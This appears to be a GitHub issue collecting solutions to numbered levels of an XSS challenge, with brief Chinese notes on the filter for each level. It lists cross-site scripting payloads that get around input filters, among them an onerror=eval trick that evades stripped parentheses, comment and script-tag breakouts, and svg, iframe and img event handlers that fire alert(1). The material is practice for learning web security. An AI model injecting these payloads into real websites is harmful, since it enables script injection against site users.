-
Notifications
You must be signed in to change notification settings - Fork 61
Open
Description
0x04
过滤圆括号
(
,)
以及反撇号`
。input.replace(/[()`]/g, '')
<script>window.onerror=eval;throw'=alert\x281\x29'</script
<iframe srcdoc="<script>parent.alert(1)</script>"
<svg><script>alert(1)</script
<svg onload=alert(1)
0x05
--!><svg onload=alert(1)>
Originally posted by @iMusic in #1 (comment)
0x09
https://www.segmentfault.com"></script><svg onerror=alert(1)><script>
0x0B||0x0C
<img src onerror=alert(1)>
Metadata
Metadata
Assignees
Labels
No labels